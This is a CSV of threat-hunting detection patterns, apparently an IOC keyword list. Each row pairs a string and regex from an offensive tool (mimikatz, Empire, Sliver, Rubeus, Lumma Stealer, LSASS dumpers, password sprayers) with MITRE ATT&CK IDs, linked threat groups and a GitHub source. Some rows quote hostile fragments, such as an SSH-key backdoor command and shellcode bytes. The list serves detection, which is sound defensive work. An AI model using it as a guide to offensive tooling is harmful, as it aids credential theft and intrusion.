"*$PowerpreterURL*",".{0,1000}\$PowerpreterURL.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","simple backdoor with anydesk","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4009"
"*$PSAmsiScanRequests*",".{0,1000}\$PSAmsiScanRequests.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#content","simple backdoor with anydesk","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","4010"
"*$ransomNoteBase64*",".{0,1000}\$ransomNoteBase64.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","4011"
"*$RESOCKS_KEY*",".{0,1000}\$RESOCKS_KEY.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","4012"
"*$RunasCsBase64*",".{0,1000}\$RunasCsBase64.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#base64","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","4013"
"*$shellcode += 0x65,0x48,0x8b,0x42,0x60*",".{0,1000}\$shellcode\s\+\=\s0x65,0x48,0x8b,0x42,0x60.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","4014"
"*$shellcode += 0x65,0x48,0x8b,0x42,0x60*",".{0,1000}\$shellcode\s\+\=\s0x65,0x48,0x8b,0x42,0x60.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","4015"
"*$SmbLoginSpray=*",".{0,1000}\$SmbLoginSpray\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","4016"
"*$SprayEmptyPasswords*",".{0,1000}\$SprayEmptyPasswords.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","4017"
"*$SQLC2Command*",".{0,1000}\$SQLC2Command.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","4018"
"*$StealToken*",".{0,1000}\$StealToken.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","4019"
"*$Taskname=""Tater""*",".{0,1000}\$Taskname\=\""Tater\"".{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#scheduledtask","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","4020"
"*$ThisIsNotTheStringYouAreLookingFor*",".{0,1000}\$ThisIsNotTheStringYouAreLookingFor.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","4022"
"*$TotalNbCurrentPwdDiscovered*",".{0,1000}\$TotalNbCurrentPwdDiscovered.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","4023"
"*$tunneler_dir/loclx.log*",".{0,1000}\$tunneler_dir\/loclx\.log.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","4024"
"*$VeaamRegPath*SqlDatabaseName*",".{0,1000}\$VeaamRegPath.{0,1000}SqlDatabaseName.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","4025"
"*$VeaamRegPath*SqlInstanceName*",".{0,1000}\$VeaamRegPath.{0,1000}SqlInstanceName.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","4026"
"*$VeaamRegPath*SqlServerName*",".{0,1000}\$VeaamRegPath.{0,1000}SqlServerName.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","4027"
"*%3u - Directory '%s' (*.kirbi)*",".{0,1000}\%3u\s\-\sDirectory\s\'\%s\'\s\(.{0,1000}\.kirbi\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/YjU2NjE0YjBiOGNlMzNhZDVlYzRhYWFkMjJhNzQ4ZGQ6MTcyNDUyMDQ0Mw==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","4029"
"*%appdaedx765ta%/Binaedx765nce*",".{0,1000}\%appdaedx765ta\%\/Binaedx765nce.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","4030"
"*%APPDATA%/Indexing.*",".{0,1000}\%APPDATA\%\/Indexing\..{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","4031"
"*%appdata%\(s)AINT*",".{0,1000}\%appdata\%\\\(s\)AINT.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","4032"
"*%APPDATA%\Windows:winrm.vbs*",".{0,1000}\%APPDATA\%\\Windows\:winrm\.vbs.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","4033"
"*%appdedx765ata%/Eledx765ectrum*",".{0,1000}\%appdedx765ata\%\/Eledx765ectrum.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","4034"
"*%appdedx765ata%/Etheedx765reum*",".{0,1000}\%appdedx765ata\%\/Etheedx765reum.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","4035"
"*%localaedx765ppdata%*",".{0,1000}\%localaedx765ppdata\%.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","4037"
"*%loedx765calappedx765data*",".{0,1000}\%loedx765calappedx765data.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","4039"
"*%qwqdanchun%*",".{0,1000}\%qwqdanchun\%.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#content","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","4040"
"*%tmp%\void.zip*",".{0,1000}\%tmp\%\\void\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","4043"
"*%userproedx765file%*",".{0,1000}\%userproedx765file\%.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","4045"
"*&& cat /etc/motd*exec -a -$(basename $SHELL) $SHELL*",".{0,1000}\&\&\scat\s\/etc\/motd.{0,1000}exec\s\-a\s\-\$\(basename\s\$SHELL\)\s\$SHELL.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider* - FANCY BEAR","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","#linux","N/A","10","9","N/A","N/A","N/A","N/A","4047"
"*&passwd=Winter2020&ok=Log+In*",".{0,1000}\&passwd\=Winter2020\&ok\=Log\+In.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#linux","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","4050"
"*&sliverpb.KillReq*",".{0,1000}\&sliverpb\.KillReq.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","4051"
"*(!soaphound=*",".{0,1000}\(!soaphound\=.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#ldap","ioc in ldap query https://github.com/FalconForceTeam/SOAPHound/blob/818a0b5add9d70c3d210f0ddcde781a85cd0cba2/ADWSUtils.cs#L42C21-L42C30","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","4052"
"*(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(!(userAccountControl:1.2.840.113556.1.4.803:=8192))(!(userAccountControl:1.2.840.113556.1.4.803:=67100867)))*",".{0,1000}\(\&\(objectCategory\=computer\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=8192\)\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=67100867\)\)\).{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","N/A","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","4054"
"*(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(operatingSystem=*server*)(!(userAccountControl:1.2.840.113556.1.4.803:=8192))(!(userAccountControl:1.2.840.113556.1.4.803:=67100867)))*",".{0,1000}\(\&\(objectCategory\=computer\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\(operatingSystem\=.{0,1000}server.{0,1000}\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=8192\)\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=67100867\)\)\).{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","N/A","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","4055"
"*(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(userAccountControl:1.2.840.113556.1.4.803:=8192))*",".{0,1000}\(\&\(objectCategory\=computer\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=8192\)\).{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","N/A","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","4056"
"*((gv *MDr*).NamE[3,11,2] -join ''*",".{0,1000}\(\(gv\s.{0,1000}MDr.{0,1000}\)\.NamE\[3,11,2\]\s\-join\s\'\'.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","4066"
"*(+) Pwned Token: * Status code: * Response: *",".{0,1000}\(\+\)\sPwned\sToken\:\s.{0,1000}\sStatus\scode\:\s.{0,1000}\sResponse\:\s.{0,1000}","offensive_tool_keyword","POC","PoC for the Veeam Recovery Orchestrator Authentication CVE-2024-29855","T1078.001 - T1078.003 - T1078.004 - T1078 - T1189","TA0006 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sinsinology/CVE-2024-29855","1","0","N/A","N/A","10","1","17","7","2024-06-17T10:45:06Z","2024-06-13T08:32:55Z","4076"
"*(Get-Process lsass).Id*",".{0,1000}\(Get\-Process\slsass\)\.Id.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4078"
"*(INFO) Spraying JWT Tokens: *",".{0,1000}\(INFO\)\sSpraying\sJWT\sTokens\:\s.{0,1000}","offensive_tool_keyword","POC","PoC for the Veeam Recovery Orchestrator Authentication CVE-2024-29855","T1078.001 - T1078.003 - T1078.004 - T1078 - T1189","TA0006 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sinsinology/CVE-2024-29855","1","0","N/A","N/A","10","1","17","7","2024-06-17T10:45:06Z","2024-06-13T08:32:55Z","4079"
"*(Invoke-WebRequest -Uri ""https://ifconfig.me/ip"").Content*",".{0,1000}\(Invoke\-WebRequest\s\-Uri\s\""https\:\/\/ifconfig\.me\/ip\""\)\.Content.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","4080"
"*(msds-supportedencryptiontypes=0)(msds-supportedencryptiontypes:1.2.840.113556.1.4.803:=4)))*",".{0,1000}\(msds\-supportedencryptiontypes\=0\)\(msds\-supportedencryptiontypes\:1\.2\.840\.113556\.1\.4\.803\:\=4\)\)\).{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","4082"
"*(msds-supportedencryptiontypes=0)(msds-supportedencryptiontypes:1.2.840.113556.1.4.803:=4)))*",".{0,1000}\(msds\-supportedencryptiontypes\=0\)\(msds\-supportedencryptiontypes\:1\.2\.840\.113556\.1\.4\.803\:\=4\)\)\).{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","4083"
"*(not launching GPOddity SMB server)*",".{0,1000}\(not\slaunching\sGPOddity\sSMB\sserver\).{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","4084"
"*(prog=""bpf-keylogger""*",".{0,1000}\(prog\=\""bpf\-keylogger\"".{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","N/A","10","1","4","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z","4087"
"*(Program.MiniDump minidump*",".{0,1000}\(Program\.MiniDump\sminidump.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#content","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","4088"
"*(SHADOW DUMPER v1.0)*",".{0,1000}\(SHADOW\sDUMPER\sv1\.0\).{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","4089"
"*('Successfully backdoored entry point with jump/call to shellcode*",".{0,1000}\(\'Successfully\sbackdoored\sentry\spoint\swith\sjump\/call\sto\sshellcode.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","4090"
"**PSEXECSVC19=b64decode(*",".{0,1000}.{0,1000}PSEXECSVC19\=b64decode\(.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","#content","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","4092"
"*. Nice assembly :D .*",".{0,1000}\.\sNice\sassembly\s\:D\s\..{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","4093"
